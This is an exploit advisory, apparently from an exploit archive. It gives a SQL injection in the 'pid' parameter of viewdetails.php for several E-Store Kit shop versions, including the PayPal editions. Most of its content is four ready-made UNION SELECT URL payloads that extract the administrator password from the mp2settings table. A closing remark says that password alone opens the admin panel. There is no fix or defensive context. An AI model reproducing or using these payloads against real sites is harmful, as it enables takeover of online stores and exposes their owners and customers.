E-Store Kit- <= 2 PayPal Edition (pid) SQL Injection Vulnerability

==================================================================
E-Store Kit- <= 2 PayPal Edition (pid) SQL Injection Vulnerability
==================================================================



###############################################################
##
## Remote SQL Injection Vulnerability
##
## E-Store Kit-1                    ( viewdetails.php pid )
## E-Store Kit-2                    ( viewdetails.php pid )
## E-Store Kit-1 Pro PayPal Edition ( viewdetails.php pid )
## E-Store Kit-2 PayPal Edition     ( viewdetails.php pid )
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ReaL-HaCk.NeT
##
## Email  : [email protected]
##
## SYRIAN Arab HACkErS
########################
########################
##
## -[[: Exploites :]]-
##
## E-Store Kit-1                    www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--
## E-Store Kit-2                    www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--
## E-Store Kit-1 Pro PayPal Edition www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,AdminPassword,0,0,0,0,0,0,0,0+FROM+mp2settings--
## E-Store Kit-2 PayPal Edition     www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--
##
########################
########################
--[[ NOTE ]]--
In admin panel none username only admin password ;D
 
#########################################################################################################



#  0day.today [2018-03-20]  #